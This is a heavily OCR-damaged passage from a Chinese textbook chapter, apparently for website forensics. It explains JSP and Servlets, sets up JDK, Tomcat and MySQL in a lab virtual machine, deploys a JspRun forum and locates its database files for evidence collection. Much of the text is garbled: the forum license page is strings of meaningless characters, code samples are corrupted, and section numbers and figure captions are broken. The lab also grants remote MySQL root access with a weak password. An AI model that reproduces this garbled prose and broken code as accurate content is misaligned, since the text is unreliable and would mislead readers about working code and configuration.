< body bgcolor= “# FFFFFF"> 
《h3> 
<% 
out. printInC JSP Hello World!") : 
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%> 


iy 要 Hello Yorldl! - Hicrosoft Internet--- 攻占 | 贺 
; 文件 @) 编辑) 查看 WW) 收藏 由， 工具 四 玫 ” 忆 | 
< /body> - » 
: @ 恨 - 2 和 | 用 拉 
vn Oa- © BOL 


地 址 四 ) | 忽 ] http:7/lecalhost:8080/chnl/t 问 | 国 畦 到 ; 渤 接 ” 


JSP 是 一 种 动态 网 页 技术 标准 ,可 以 将 
网 页 中 的 动态 部 分 和 静态 的 HTML 相 分 
离 。 用 户 可 先 书写 HTML 语句 ,然后 将 动 
态 部 分 用 特殊 的 标记 代入 即 可 ,这 些 标记 常 
常 以 “<% ?开始 并 以 “% 二 ”结束 。 Intronet 

程序 运行 效果 如 图 6-1 所 示 。 图 6-1 helloWorld. jsp 运行 效果 


612 JSP 发 展 历 史 


JSP 是 在 Servlet 的 基础 上 发 展 起 来 的 ,Servlet 是 一 种 Java 程序 ,具有 以 下 特点 : 

(1) Servlet 是 Sun 公司 早期 开发 的 一 种 服务 器 端 运行 的 Java 程序 ,支持 HTTP 协 
议 的 请 求 和 响应 ,可 以 生成 动态 的 Web 页 面 。 

(2) Servlet 使 用 println 语句 生成 页 面 。 

例如 ,sevlet. java 文件 内 容 如 下 : 


JSP Hello World! 


PrintWriter pw= res. getWr iter 0 : 

pw.printin(< head> ") ; 

pw.println(< title> nihao /title> "); 

pw.println(< /head> "); 

pw.println(< body bgcolor=# cc99dd> ”) ; 

pw.println(< hl> hello world!< /ht> "); 

pw.println(< /body> ") ; 

pw. close 0 ; 

该 文件 的 最 终结 果 就 在 网 页 内 显示 “hello world!1”。 

在 Microsoft 公司 的 ASP 技术 出 现 后 ,使 用 Servlet 进行 响应 输出 时 一 行 行 的 输出 语 
句 就 显得 非常 笨拙 ,对 于 复杂 布局 或 显示 页 面 更 是 如 此 。JSP 就 是 为 了 满足 这 种 需求 在 
Servlet 技术 之 上 开发 的 。 


613 JSP 与 ASP.PHP 比较 


同 HTML 以 及 ASP 等 语言 相 比 ,JSP 虽然 在 表现 形式 上 同 它们 的 差别 并 不 大 ,但 是 
它 却 提供 了 一 种 更 为 简便 ` 有 效 的 动态 网 页 编写 手段 ,而 且 由 于 JSP 程序 同 Java 语言 有 
着 天 然 的 联系 ,所 以 在 众多 基于 Web 的 架构 中 ,都 可 以 看 到 JSP 程序 。 

由 于 JSP 程序 增强 了 Web 页 面 程序 的 独立 性 .兼容 性 和 可 重用 性 ,与 传统 的 ASP、 
PHP 网 络 编程 语言 相 比 具有 以 下 特点 。 

1. JSP 的 执行 效率 比较 高 

由 于 每 个 基于 JSP 的 页 面 都 被 Java 虚拟 机 事先 解析 成 一 个 Servlet ,服务 器 通过 网 络 
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接收 到 来 自 客户 端 HTTP 的 请 求 后 ,Java 虚拟 机 解析 产生 的 Servlet 将 开启 一 个 “线程 ” 
(Thread) 来 提供 服务 ,并 在 服务 处 理 结束 后 自动 销毁 这 个 线程 ,如 图 6-2 所 示 。 这 样 的 处 
理 方式 将 大 大 提高 系统 的 利用 率 , 并 能 有 效 地 降低 系统 的 负载 。 


Web 服务 器 
HTTP 请 求 Servlet 线 程 
HTTP 请 求 
| (sevieti | 
Servlet 线 程 


图 6-2 Web 服务 器 使 用 Servlet 提供 服务 


2. 编写 简单 
由 于 JSP 是 基于 Java 语言 和 HTML 元 素 的 一 项 技术 ,所 以 只 要 熟悉 Java 和 HTML 
的 程序 员 都 可 以 开发 JSP。 


3. 跨 平台 

由 于 JSP 运行 在 Java 虚拟 机 之 上 ,所 以 它 可 以 借助 于 Java 本 身 的 跨 平 台 能 力 ,在 任 
何 支持 Java 的 平台 和 操作 系统 上 运行 。 

JSP 可 以 嵌 套 在 HTML 或 XML 网 页 中 ,不 


仅 可 以 降低 程序 员 开发 页 面 显示 罗 辑 效果 的 工作 后 杂 
量 ,更 能 提供 一 种 轻便 的 方式 同 其 他 Web 程序 
交互 。 JSP Some 否 解析 JSP 
6.14 JSP 技 术 原 理 是 
JSP 文件 的 执行 方式 是 “编译 式 ”, 而 不 是 “ 解 ” 是 fsP servie ee 
释 式 ", 即 在 执行 JSP 页 面 时 ,是 把 JSP 文件 先 翻 En Serviet 
译 为 Servlet 形式 Java 类 型 的 字 节 码 文件 ,然后 厅 | | 
通过 Java 虚拟 机 来 运行 。 从 本 质 上 来 讲 ,运行 加 载 serviet| 一 一 一 | 编译 SP 
JSP 文 件 最 终 还 是 要 通过 Java 虚拟 机 ,不 过 根据 
JSP 技术 的 相关 规范 ,JSP 语言 必须 在 某 个 构建 | _ 几 
于 Java 虚拟 机 之 上 的 特殊 环境 中 运行 ,这 个 特殊 
环境 就 是 Servlet 容器 (Servlet Container) 。 每 个 生成 
JSP 页 面 在 被 系统 调用 之 前 ,必须 先 被 Servlet 容 响应 
器 解析 成 一 个 Servlet 文件 。 
图 6-3 所 示 为 整个 JSP 的 运行 流程 。 J 
每 次 Servlet 容器 接受 到 一 个 JSP 请 求 时 ,都 
会 遵循 以 下 步骤 : 图 6-3 JSP 运行 原理 
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(1) Servlet 容器 查询 所 需要 加 载 的 JSP 文件 是 否 已 经 被 解析 成 Servlet 文件 ,如 果 没 
有 在 Servlet 容器 里 找到 对 应 的 Servlet 文件 ,容器 将 根据 JSP 文件 新 创建 一 个 Servlet 文 
件 ; 反 之 ,如 果 在 容器 里 有 此 Servlet 文件 ,容器 则 比较 两 者 的 时 间 。 如 果 JSP 文件 的 时 间 
要 晚 于 Servlet 文件 , 则 说 明 此 JSP 文件 已 被 重新 修改 过 ,需要 容器 重新 生成 Servlet 文 
件 ;反之 容器 将 使 用 原先 的 Servlet 文件 。 

(2) 容器 编译 好 的 Servlet 文件 被 加 载 到 Servlet 容器 中 ,执行 定义 在 该 JSP 文件 里 
的 各 项 操作 。 

(3) Servlet 容器 生成 响应 结果 ,并 返回 给 客户 端 。 

(4) JSP 文件 结束 运行 。 

从 这 个 JSP 的 工作 原理 和 运作 流程 上 来 看 ,JSP 程序 既 能 以 Java 语言 的 方式 处 理 
Web 程序 中 的 业务 逻辑 ,也 可 以 处 理 基 于 HTML 协议 的 请 求 , 它 是 集 众 多 功能 于 一 身 的 。 

不 过 ,在 编写 程序 的 过 程 中 ,不 能 过 多 地 在 JSP 代码 里 混杂 提供 显示 功能 和 提供 业 
务 逻 辑 的 代码 ,而 是 要 把 JSP 程序 定位 到 “管理 显示 逻辑 ?的 角色 上 。 

当 服 务 器 第 一 次 接收 到 对 某 个 页 面 的 请 求 时 ,JSP 引擎 就 开始 进行 上 述 的 处 理 过 程 ， 
将 被 请 求 的 JSP 文件 编译 成 Class 文件 。 在 后 续 对 该 页 面 再 次 进行 请 求 时 , 若 页 面 没有 
进行 任何 改动 ,服务 器 只 需 直接 调用 Class 文件 执行 即 可 。 所 以 当 某 个 JSP 页 面 第 一 次 
被 请 求 时 ,会 有 一 些 延迟 ,而 再 次 访问 时 会 感觉 快 了 很 多 。 如 果 被 请 求 的 页 面 经 过 修改 ， 
服务 器 将 会 重新 编译 这 个 文件 ,然后 执行 。 


6.2 ”构建 JSP 网 站 运行 平台 


从 JSP 文 件 的 执行 过 程 来 看 ,要 想 在 服务 器 内 运行 JSP 文件 , 则 必须 在 其 中 安装 能 
够 承担 JSP 引擎 、Java 编译 器 .Java 虚拟 机 角色 的 软件 。 在 本 节 实 验 环境 中 选择 
Windows 2003 Server 虚拟 机 作为 网 站 服务 器 ,其 IP 地 址 为 192. 168. 111. 128 ,在 该 机 器 
内 安装 JDK TOMCAT 及 MySQL 数据 库 软件 来 构建 JSP 网 站 的 基本 运行 平台 。 


621 JDK 


JDK(Java Development Kit) 是 整个 Java 的 核心 ,包括 Java 运行 环境 、Java 工具 和 
Java 基础 的 类 库 。 正 确 安装 JDK 并 设置 相关 参数 是 Java 程序 的 基本 运行 要 求 。 

其 中 ,两 个 常用 的 工具 如 下 。 

(1) javac。 

编译 器 ,将 Java 源 程 序 转 成 对 应 的 字 节 码 文件 , 即 Class 文件 。 

(2) Java。 

Java 用 来 执行 字 节 码 文件 。 

1. 安装 jdk 

双击 jdk-1_5_0_22-windows-i586-p. exe 文件 进行 安装 J2SDK ,所 有 安装 选项 按 默 认 
设置 即 可 ,其 中 要 注意 查看 软件 的 安装 目录 。 
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2. 环境 变量 设置 

安装 完成 后 需要 配置 环境 变量 ,假定 J2SDK 安装 在 C:\Program Files\Java\jdk1. 
5.0_22 目录 内 ,具体 方法 如 下 : 

“我 的 电脑 ? 右 击 ,在 弹出 的 快捷 菜单 中 选择 “属性 ”命令 ,打开 “系统 属性 ”对 话 框 , 切 
换 至 “高 级 ”选项 卡 ,点 击 “ 环 境 变量 ”按钮 ,打开 本 到 


“环境 变量 ”对 话 框 , 新建 用 户 变量 JAVA _ 
变量 名 四 [TAVA_HOME| 
HOME ,变量 值 为 C:\Program Files\Java\jdk1. 赤 量 值 四 TTA 


2, 如 图 6-4 所 示 ; 新 建 系统 变量 classpath， 取消 
变量 eh _HOME% \lib\dt. jar; WJAVA _ 
HOME%\lib\tools. jar; 编辑 系统 变量 path, 增 图 6-4 “编辑 用 户 变 量 ” 对 话 框 
加 %JAVA_HOME%\bin, 如 图 6-5 所 示 。 
Ed| Hx 
0 | | 
变量 值 四) VA 变量 值 0) [RTAVA_HOMEX\ bin: XSystenRooth\systen’ 
已 枉 |] 了 


量 ” 对 话 框 


3. 测试 

可 以 写 一 个 简单 的 Java 程序 来 测试 J2SDK 是 否 已 安装 成 功 。 
public class Test { 

public static void main(String args[) { 

System out. println(This is a test program "); 

} 

} 


将 上 面 的 这 段 程序 保存 为 文件 名 为 Test. java 的 文件 并 将 其 放 在 C 盘 根 目录 下 , 然 
后 打开 命令 提示 符 窗口 ,进入 到 Test. java 所 在 目录 ,然后 输入 下 面 的 命令 : 


Javac Test. java 


Java Test 


运行 结果 如 图 6-6 所 示 ,表明 系统 已 经 正确 安装 了 JDK。 


\Documents and Settings\AdninistratorYcd \ 


t progran. 


图 6-6 J2SDK 安装 成 功 测试 结果 
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622 Tomcat 


Tomcat 是 Apache Group Jakarta 小 组 开发 的 一 个 免费 服务 器 软件 包 , 是 一 个 支持 
Servlet 和 JSP 运行 的 容器 ,适合 嵌入 Apache 服务 器 中 使 用 ,也 可 独立 成 为 Web 应 用 服 
务 器 。 一 般 地 说 ,大 的 站 点 都 是 将 Tomcat 与 Apache 结合 ,Apache 负责 接受 所 有 来 自 客 
户 端的 HTTP 请 求 , 然 后 将 Servlets 和 JSP 的 请 求 转发 给 Tomcat 来 处 理 。Tomcat 完成 
处 理 后 ,将 响应 传 回 给 Apache, 最 后 Apache 将 响应 返回 给 客户 端 。Tomcat 处 理 静 态 
HTML 的 能 力 不 如 Apache 服务 器 。Tomcat 作为 JSP 的 引擎 ,调用 JDK 来 编译 和 执行 
JSP 中 Java 程序 代码 。 


1. Tomcat 软件 安装 

本 实验 采用 的 Tomcat 软件 为 解压 缩 免 安装 版 本 ,直接 将 给 定 的 apache-tomcat-5. 5. 
31. zip 文件 解压 缩 到 C 盘 根 目录 下 即 可 。 

启动 Tomcat 软件 方法 很 简单 ,直接 双击 bin 子 目录 下 的 startup. bat 脚本 文件 ,启动 
界面 如 图 6-7 所 示 。 


r init 
[true], accept filters 


11-Httpllh col init 
80680 


jpAprProtocol init 


load 


tpl1.HttpiiAp 
8888 


c jp.hjphprProtocol st 
te AJP/1.3 on ajp-8989 


tartup in 


图 6-7 Tomcat 启动 界面 


通过 客户 端 输入 http://192. 168. 111. 128: 8080 ,出 现 如 图 6-8 所 示 的 界 
Tomcat 安装 成 功 。 


i, 表明 


2. Tomcat 目录 结构 
解压 后 的 软件 目录 结构 如 下 : 
。 /bin 存放 启动 和 关闭 Tomcat 的 脚本 文件 ; 
。 /common/lib 存放 Tomcat 服务 器 及 所 有 Web 应 用 程序 都 可 以 访问 的 JAR 
文件 ; 
。 /conf 存放 Tomcat 服务 器 的 各 种 配置 文件 ,其 中 包括 server. xml(Tomcat 的 了 
配置 文件 ) tomcat-users. xml 和 Web. xml 等 配置 文件 ; 
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J9FE :Oat 
Mik) [€] ms//192.168.111.126:0000/ 


Ap 
Temt5531 The Apache Software Foundation 
http://www.apache.org/ 


If you're seeing this page via a web browser, it means you've setup Tomcat 
successfully. Congratulations! 


Status 
Tomcat Administration As you may have guessed by now, this is the default Tomcat home page. tt can be 
Tomcat Manager found on the local filesystem at- 
SCATALINA_ HOME/webapps/ROoT/index.jsp 
Where "$CATALINA_HOME" is the root of the Tomcat installation directory, If you're 

Release Notes seeing this page, and you don't think you should be, then either you're either a user who 
Change Log has arrived at new installation of Tomcat, or you're an administrator who hasn't got 

jm ntation hisher ‘setup quite rioht Providing the latter is the case,please refer to the Tomcat 


ion for more detailed setup and administration information than is found in 
he INSTALL fle 


[TomcatOnline | NOTE: This page is precompiled. If you change it, this page will not change since it 


Home Page Was compiled into a serviet at build time. (See scATALINA_HONE/ webapps/ROOT/VEB- 
EAQ INF/veb.xml 35 to how it was mapped ) 

Bug Database 

Open Bugs NOTE: For security reasons, using the administration webapp is restricted to 
Users Mailing List Users with role "admin". The manager webapp is restricted to users with role 
所 "manager". Users are defined in $cATALINA_HONE/conf/tomcat-users. xml 昌 


TT 网 mm 


4 


图 6-8 Tomcat 默认 网 页 


。 /logs 存放 Tomcat 的 日 志文 件 ; 

。 /server/lib 存放 Tomcat 服务 器 运行 所 需 的 各 种 JAR 文件 ; 

。 /server/Webapps 存放 Tomcat 的 两 个 Web 应 用 程序 一 一 admin 应 用 程序 和 
manager 应 用 程序 ; 

。 /shared/lib 存放 所 有 Web 应 用 程序 都 可 以 访问 的 JAR 文件 ; 

。 /temp 存放 Tomcat 运行 时 产生 的 临时 文件 ; 

。 /Webapps 当 发 布 Web 应 用 程序 时 ,通常 把 Web 应 用 程序 的 目录 及 文件 放 到 这 
个 目录 下 ; 

。 /work Tomcat 将 JSP 生成 的 Servlet 源 文件 和 字 节 码 文件 放 到 这 个 目录 下 。 


3. MSQL 数据 库 

本 实验 选择 在 Windows 系统 平台 中 安装 MySQL .与 在 Linux 系统 中 安装 该 软件 过 
程 相 比 ,比较 简单 ,只 需 双 击 给 定 的 mysql-5. 5. 19-win32. msi 文件 ,根据 安装 向 导 默 认 选 
项 进行 安装 即 可 。 

安装 完成 后 , 选择 “所 有 程序 ”> MySQL 一 MySQL Server 5. 5 一 MySQL 5. 5 
Command Line Client 命令 ,弹出 MySQL 命令 行 客户 端 窗口 ,会 自动 连接 到 MySQL 数 
据 库 ,可 使 用 SQL 语句 查询 数据 库 ,界面 如 图 6-9 所 示 。 

为 方便 起 见 , 也 可 在 本 机 安装 MySQL 图 形 客户 端 工具 ,如 MySQL-Front 等 ,远程 连 
接 数 据 库 进行 操作 管理 ,具体 方法 参见 3. 4. 3 节 。 注 意 , 在 使 用 该 工具 远程 连接 数据 库 服 
务 器 前 ,必须 在 服务 器 内 提升 root 的 权限 ,具体 命令 执行 结果 如 图 6-10 所 示 。 
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Conmands end with ; or \g. 


mmunity er 《GPL》 


ffiliates. All ri 


rw ”sh for help. Type ’\c’ to clear the current input statenent. 


! performance_schema } 
! test 
s in set Cg.01 sec) 


图 6-9 MySQL 数据 库 安装 成 功 测试 结果 


on #*.x* to root@"x" identified by ’111111’ with grant 


affected C0.1 


图 6-10 授权 命令 执行 界面 


6.3 发 布 JSP 网 站 


与 ASP.PHP 网 站 的 发 布 方法 一 样 ,JSP 网 站 的 部 署 过 程 也 分 为 发 布 网 页 脚本 程序 、 
创建 后 台数 据 库 及 设置 数据 库 连 接 参数 三 个 步骤 。 本 实验 采用 的 JspRun 网 站 带 有 安装 
向 导 ,能 够 根据 向 导 自 动 完成 后 两 个 步骤 ,因此 只 需 在 服务 器 内 通过 Tomcat 发 布 
JspRun 网 站 ,具体 过 程 如 下 。 


63.1 准备 网 站 源码 文件 

将 给 定 的 JspRun!_6_GBK. rar 文件 上 传 至 服务 器 内 ,解压 缩 后 将 所 有 的 源码 文件 复 
制 到 C;\jrun 文件 夹 内 。 

632 配置 虚拟 目录 


将 Tomcat 安装 目录 下 的 conf 子 文件 夹 下 server. xml 文件 打开 ,搜索 “二 Host ” 关 
键 字 ,找到 以 下 配置 段 : 


< Host name= “localhost” appBase= “Webapps” 
unpackWARs= “true” autoDeploy= “true” 
xmlValidatior= “false” xmlNamespaceAware= "false > 
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在 其 后 增加 如 下 代码 : 


< Context path= “/ ”docBase= “c:\jrun /> 


633 更 改 网 站 监听 端口 


默认 情况 下 ,Tomcat 网 站 端口 为 8080 ,为 了 方便 访问 ,可 以 在 server. xml 文件 中 搜 
索 8080 关键 字 ,找到 以 下 配置 段 : 
< Connector port= “8080” maxHttpHeaderSize= “8192” 
maxThreads= “150” minSpareThreads= “25 ”maxSpareThreads= 75” 
enableLookups= “false” redirectPort= “8443” acceptCount= “100” 
connectionTimeout= “20000” disableUploadTimeout= “true” /> 
将 其 中 的 8080 改 为 80。 
修改 配置 文件 后 ,要 重新 启动 Tomcat 服务 器 ,才能 使 最 新 的 配置 文件 生效 。 


634 访问 网 站 安装 向 导 


在 本 机 启动 浏览 器 ,输入 http://192. 168. 111. 128/install. jsp ,访问 网 站 安装 向 导 ， 
页 面 如 图 6-11 所 示 。 


中 六 版 授权 协 六 迫 用 于 中 以 用 户 


各 可 所 有 (C) 2007-2009 ,北京 加 创 扯 科技 和 有限 公 司 
保 久 所 有 权 刊 


感谢 您 过 择 phUnl 论坛 产品 。 希 望 守 们 的 怒放 能 为 让 提 具 个 高 族 快 速 和 经 大 的 社区 论坛 解决 方案 


北京 飞 刘 创 相 科技 有 限 公司 为 hpRUn| 产品 和 开 两 ， 依 寺 多 立 担 有 spRunl 产品 革 作 可 中 国 加 人 版 把 展 革 作 权 轩 记 导 200GSRD1486 ) -北京 志 这 科技 有 阳 公 司 网 址 注 htypjjwww juncom ， 
JSoRUnI 补考 网站 网 站 为 httpyjfwww rur com ,jpRunl 窗 方 讨论 区 网 引 为 http jjwww jarun net, 


gpRUnI 著作 祝 巴 在 中 华人 民 共和 国 国 允 版 权 局 主 朋 ,著作权 近 潭 肢 律 和 国际 公 的 保护 。 使 用 者 ; 无 论证 入职 措 捐 、 王 利 与 否 ， 用 过 如何 ( 刀 演 则 学 习 和 阴 究 为 目的 ) ， 均 需 生 经 辕 读 本 协议 ,在 坦 解 、 同 意 ， 
拓 章 只 术 协议 的 全 名 条 区 后 ， 旋 可 开始 使 用 JPRL 软件 ， 


本 折 可 怕 训 省 用 且 避 适用 于 JspRunl 6.y.x 版 本 ， 北 京 飞 这 创 想 科 扶 有限 公司 拥有 对 直 扔 权 催 识 的 最 纤 种 么 权 ， 


人 协议 许可 的 权利 
1， 你 可 凡 在 完全 语 守 本 全 续 用 记 接 观 协议 的 友 碰 上 ， 交 二 劝 件 厅 用 二 非 森 业 用 这 ,而 不 性 去 付 歌 件 眶 失手 权 内 用 
2 你 可 以 在 铺设 项 定 的 内 束 和 限 制 隔 内 做 到 JspRunl 禄 代码 (90 时 次 提供 的 庄 ) 歌 办 各 和 焰 以 于 太 如 0 站 村 未。 
您 首 有 仙 用 本 软件 交 叶 的 论 二 中 全 部 会 页 实 料 、 文 章 及 相关 信息 的 镀 有 模 ， 并 痢 立 和 反 与 文章 内 各 鸡 相 天 法 律 义 劳 。 
4 效 得 商业 措 权 之 后 ， 修 加 以 生态 软件 岂 用 于 了 业 用 崇 ， 网 代 押 新 网 区 授权 关 划 中 此 证 技术 支持 队 、 技 术 支 持 方式 和 技术 支持 内 容 ， 自 购买 各 | 起 ， 在 技术 支持 基 限 内 基 和 有 通过 指 这 的 方 
式 奖 人 措 定 范围 内 的 技术 女排 服 短 商业 授 李 月 户 字 有 反 肌 和 提出 衣 风 的 权力 ， 相 关 家 见 本社 作 力 首 要 羽 虑 但 届 有 一 定居 的 的 重 庄 下 保证 。 


Ti 协议 规 守 的 的 来 和 限制 


1 未 上 托 权 之 闪 ， 不 和 过 坎 作用 于 商业 有 过 全 了 限于 企业 国光 。 二 和 内 旧 束 宙 显 和 的 Pt ) 。 多 商业 括 要 计时 ht /rwww prun com 估 才 相 着 明 ,也 可 以 
1 和 让 说: 于 才 于 的 于 Se Te 


SS 加 果 作 能 着 守 末 协 以 的 条 协 ， 您 的 授 机 村 习 妊 止 ， 所 补 洗 可 的 职 利和 读 收 回 ,并 承 择 相 应 法 健 才 任 . 


全 ， 有 限 招 保 和 音 南 声明 
1 志 软 昨 及 所 附 攻 的 立 上 是 作为 丰 提 兴 任 何 明 硼 的 或 隐 信 的 隔 们 或 于 避 芍 开 邯 拉 供 的. 
2 用 记 出 于 目 床 而 使 用 下 软 件 ， 烃 作 滴 了 解 使 用 玉 软 证 90 风 性， 在 尚 椒 辽 产品 技术 狂 务 之 而 ， 才 们 不 重 语 提 代 任 同形 式 B9 技 术 支 竺 ， 俐 用 担保， 也 不 着 担任 何 因 侈 和 本 软件 而 产生 问题 8 相关 表 
任 。 
北京 于 创 想 科技 有 了 艰 公 司 不 对 全 用 直 软 件 构建 的 这 二 中 的 文生 吕 搬 息 关 担 天 任 , 


有 关 ]5pRunl 是 络 用 户 折 识 协 汶 、 商 业 摊 识 与 技 上 服务 的 癌 内 窜 ， 均 由 phun| 舍 方 风波 外 二 提供， 北京 飞 二 创 提 科技 表 隐 公司 拥有 在 二 事先 才 知 的 情史 下 ， 修 放 授权 忆 议 和 和 服务 价目 素 的 权力 ， 修 下 后 的 协 
说 王 价 目 来 对 自 下 秋之 日 起 的 新 皖 权 用 户 生效 。 


认 子 信 双 形式 的 重 和 协议 可 同 双方 书面 芝 轨 的 内 议 一 搓 ， 且 有 鞠 全 及 和 等 同 的 法 委 区 力 。 字 一 旦 开垦 奖 JRunl ,国花 视 为 完全 得 多 并 所 受 让 协 的 各 项 条 和 ,在 至 有 上 述 条 过 搓 记 的 权力 的 同时 ,受到 kB 关 
的 约束 和 限制 。 协 讽 许 可 学 荐 :4hg 行 对， 霸 直 揪 违 丘 万 项 各 夫 以 开 构 成 全 滩 ， 淮 们 有 入 随时 和 上 玲 科 ， 者 信 停止 朱 守 ， 秆 尝 乱 过 吕 相 天 者 什 39 机 放 。 


图 6-11 JspRun 网 站 安装 向 导 界 面 


单 击 “ 我 同意 ”按钮 ,安装 向 导 会 自动 检查 系统 及 相关 配置 文件 状态 ,如 图 6-12 所 示 。 
如 符合 安装 条 件 , 则 单 击 “ 下 一 步 "按钮 。 
接 下 来 进行 数据 库 设 置 , 在 如 图 6-13 所 示 的 界面 中 输入 正确 的 数据 库 服务 器 IP 地 
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。 将 压 绒 包 中 JspRun! 目录 下 全 部 文生 和 目 和 东 上 估 有 服务 器 。 

。 如 果 您 使 用 非 WINNT 系 纺 请 修改 以 下 属性 

templates 目录 777; ./attachments 目录 777; ./customavatars 目录 777; ./forumdata 目 寺 777; 
forumdata/cache 目录 777; ./forumdata/templates 目录 777; /forumdata/threadcadhes 目录 777 
/forumdata/logs 目录 777; 

确认 URL 中 Jattachments 可 以 访问 县 学 器 目录 ./attadhments 内 容 。 

。 如 果 config,properties 诡 件 趟 本 写 ， 请 日 行 修改 训 文 件 上 传 到 沦 坛 根 目录 下 。 
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JipRunl 所 许配 轩 Jsppunl 景 信也 轨 . 
次 作 红 不 民 UNDWLinudFreeESD Wndows 
地 岳 本 15+ 15+ 15022 
附件 上 信 th ES 思 评 /最 大 尺寸 SM 
MsQL 支持 Ee EE 支 并 
出 室 间 a0 EE 7214M 
EE 
config propertes 可 读 可 写 
/templates | 可 潜 本 
attachnent | 可 5 
customavatars | 可 写 9S 
Tumadars 本 可 写 
orumdata/ templates 本 9 写 
orumdatacarhe 可 二 可 写 
/orumdata/threadcacnes 可 写 可 写 
Tumdaialags 本 


图 6-12 “检查 配置 文件 状态 ”界面 


及 表 名 前 组 。 


wm 


。 请 在 下 面 填写 您 的 数据 库 隆 号 信息, 通 委 情 况 下 不 需要 租 改 红色 沁 项 内 容 , 


效 据 订 服 务 器 由 址 一 和 为 |ocahoxt 或 127D.01 
Es | ERETTET 
手记 用 户 各 le 捧 据 库 际 引 用 户 人 
数据 库 密码; | _| 数据 库 几 寻 灾 到 
数据 库 名 em | 涩 据 库 扣 丈 
了 [= 月 于 从 得 序 兴 训 报 各 
[rm 同 -- 数 生 生 安 装 多 论坛 果 可 以 到 对 从 


图 6-13 “数据 库 连接 参数 "配置 界面 


FE 


并 指定 要 生成 的 数据 库 名 


在 如 图 6-14 所 示 的 页 面 中 设置 论坛 管理 员 的 账号 名 及 密码 ,要 记 好 ,后 面 会 用 到 该 


日 户 进入 网 站 后 台 管理 界面 进行 管理 维护 操作 。 


图 6-14 “设置 管理 员 账 号 界面 
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系统 会 自动 在 数据 库 服务 器 内 创建 相关 数据 表 并 写 人 重要 的 初始 数据 ,完成 后 ,弹出 
“恭喜 您 论坛 安装 成 功 , 点 击 进 入 论坛 首页 ?按钮 ,如 图 6-15 所 示 。 


>> JspRun! 6.0.0 简体 中 文 版 安装 向 导 


当前 状态 : 开始 安 半 Epaunl 


到 
图 6-15 创建 数据 库 成 功 界面 
最 后 , 单 击 该 按钮 ,进入 论坛 网 站 首页 ,如 图 6-16 所 示 。 
证 明王 好“ 会员” 标 息 “ 纺 计 ~ 天 
JepRunt 今日 0 昨日 0, 好 高 日 0 精光 国 
[ER 主题 0, 央 了 0 会员-1, 欢 所 新 各 admin 
ee 
版 主题 帖 政 。。 最 后 发表 

人 A o 0 有 
友信 全 所 


加 。 pfunt 官方 论坛 < 
提供 最 新 JSDRUnI 产品 晰 吴 、 软 件 下 载 与 技术 你 流 Jspron! 


在 栈 会 员 - 0 人 在 线 -0 会 员 (0 隐 身 ), 0 位 着 客 -最 丙 记 录 是 1 于 2008-11-11 
人 8 Den triE 同仁 四 
当前 只 有 游客 或 隐身 会 员 在 线 


图 6-16 JspRun 论坛 网 站 首页 


6.4 网 站 分 析 


641 数据 库 位 置 


使 用 网 站 安装 向 导 的 最 后 一 步 ,会 自动 创建 数据 库 、 数 据 表 及 系统 初始 数据 ,我 们 可 
以 在 后 台 服 务 器 内 通过 以 下 步骤 找到 所 创建 的 MySQL 数据 库 文件 : 
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1. 定位 MSQL 数据 库 配 置 文件 myini 

在 Windows 平台 下 安装 MySQL 数据 库 后 ,默认 会 在 “程序 ”菜单 项 增加 MySQL 
Command Line Client 项 ,在 该 子 菜单 项 上 右 击 ,在 弹出 的 快捷 菜单 中 选择 “属性 ”命令 ， 
在 打开 的 对 话 框 中 可 见 my. ini 的 位 置 ,如 图 6-17 所 示 。 


辣 色 | “ 莱 福 | ”安全 | 
常规 。 。 快 搜 方式 | 选项 | 字体 | 布局 


MySQL 5.5 Command Line Client 


目标 类 型 应 用 程序 
目标 位 置 :bin 
目标 他 ); |s\MySQL\ySQL Server 5.5\my. ini” “~uroo 


起 始 位 置 @): [C:\Program Files\ItySQL\MySQL Server 5. 
癸 纯 征 G 并 
运 入 式 Wy: [MD 本 
SEW: fi 
查找 目标 四 .| 更 改 图 祭 避 | 高 级 @@). 


取消 | 


图 6-17 “MySQL 5.5 Command Line Client 属性 ”对 话 框 


2. 找到 数据 库 文件 

通过 查看 MySQL 命令 行 属性 窗口 可 知 , my. ini 文件 位 于 C:\Program Files\ 
MySQL\MySQL Server 5.5 目录 下 ,打开 my. ini 文件 ,找到 datadir 指令 ,后 面 跟着 的 字 
符 串 即 为 数据 库 文件 所 在 目录 ,如 图 6-18 所 示 。 在 资源 管理 器 中 进入 该 目录 ,可 见 网 站 
安装 向 导 系 统 所 生成 的 数据 库 文件 ,如 图 6-19 所 示 。 


BE 
文件 于)】 编辑 下) 格式 0) 查看 必 ) 帮助 00 


#Path to installation directory. All paths are usually resolved relative to this. 
basedir="C:/Program Files/MySQL/MySQL Server 5.5/™ 


HPath to the database root | 


datadir="C:/Docunents and Settings/AlL Users/Application Data/MySQL/MySQL Server 5.5/Data/” 


# The default character set that will be used when a new schema or table is 
# created and no character set is defined | 


图 6-18 数据 库 文件 所 在 目录 


若 要 调查 相关 网 站 ,在 复制 网 站 源码 的 同时 ,也 要 将 相关 的 数据 库 文件 复制 出 来 ,这 
样 在 后 期 对 网 站 进行 调查 取证 时 , 才 会 有 真正 的 有 价值 数据 。 
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文件 四 ”编辑 查看 WW 收藏 ) 工 具 于 助 吧 | 猴 
回 恨 -日 "这 | 记 拉 口 章 天 | 访 访 XX 史 | 回 - 


地 址 他 | 忆 c: \Docments and Settings\All Users\Application Data\llySQL\ySQL Server 5.5\data\jsprun 本 国 甘 到 


加 jr nagiclog frm 9 到 FBN 文件 2012-4-28 13:55 


A 
国 jrun_nagi enarket. fm 9 到 FB 文件 2012-4-26 13:55 A 二 
国 jrun_nagics. fm 9 到 FB 文件 2012-4-28 13:55 A 
国 jrun_nedals. frn 9 到 FB 文件 2012-4-28 13:55 A 
国 jrun_nenber fields. frn 10 玛 FB 文件 2012-4-28 13:55 A 
国 jrun_nenbernagics. frm 9 到 FB 文件 2012-4-28 13:55 A 
国 jrun_nenbers. fm 11 玛 了 B 文件 2012-4-28 13:55 人 
国 jrun_nenberspaces. frm 9 到 FB 文件 2012-4-28 13:55 A 
加 iran noderators, frm 9 三 _FBI 文件 2012-4-28 13:55 入 
4 p 

Ts 个 对 象 [02 喇 “| 本 我 的 电脑 及 


图 6-19 JspRun 论坛 数据 库 文件 


642 连接 配置 文件 


在 后 台 网 站 系统 中 ,只 有 配置 正确 的 数据 库 连 接 参 数 ,才能 保证 用 户 能 够 正常 浏览 并 
通过 前 台 Web 页 面 来 操作 后 台数 据 库 内 的 数据 。 通 过 网 站 安装 向 导 进 行 系统 安装 时 ,其 
